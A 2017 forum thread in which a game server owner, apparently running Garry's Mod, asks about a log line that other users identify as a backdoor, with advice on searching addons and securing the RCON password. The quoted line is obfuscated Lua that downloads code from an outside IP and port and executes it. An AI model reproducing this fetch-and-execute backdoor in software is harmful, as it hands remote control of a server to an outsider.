Suspicion of the lua virus

Hello programmers! I have such a line in the logs that it means.
Knowledgeable people please give a link to the lua file to which the line refers.
After this line, I myself have changed the nickname. What the hell is this?


> http.Fetch ( [[http]] .. string.char ( 58, 47, 47 ) .. [[92.100.87.54]] .. string.char ( 58 ) .. [[1337/1.lua]], function ( c ) pcall ( CompileString ( c, [[]], false ) ) end )...

it’s not a virus, but it means something on your server holds a backdoor to run code from the listed IP

it’s probably something your server is subscribed to from the Workshop

It’s don’t danger?

It is dangerous. You need to find out which addon in your server contains that line of code.

How to find a back door? I searched in all the lua files, nothing special.

Which lua files did you search?

In addon’s folder

Did you read the lua files hidden inside of the .gma files in the addons folder?

I have only folders in the folder, there is not one .gma file.

Are you looking in the folder on your computer, or the server computer?

Dedicated Server

I’m out of ideas; sorry.

If your server is not subscribed to workshop .gma addons and you’re certain that your legacy addon folders do not contain lua files with http.Fetch, I don’t know where your log entry came from.

Perhaps E2P inject or RCON, but I disabled E2P on the server.

[editline]6th March 2017[/editline]

I buy scripts in scriptfolder, there is a check for the validity of the addon, only now it’s alarming: “1337/1.lua”.

Make sure your RCON password is set via server command line and not a .cfg file. If it was a .cfg before, change the password too.

[editline]6th March 2017[/editline]

I don’t know what scriptfodder does to check validity; I’ve not used it before. I don’t know if that’s normal or not.

Okay, understand.

[editline]6th March 2017[/editline]

I’m afraid _. I hope the server will not break.

[editline]6th March 2017[/editline]

Thank you! You are very cool not that there is support in Russia. :asdfghjkl;’: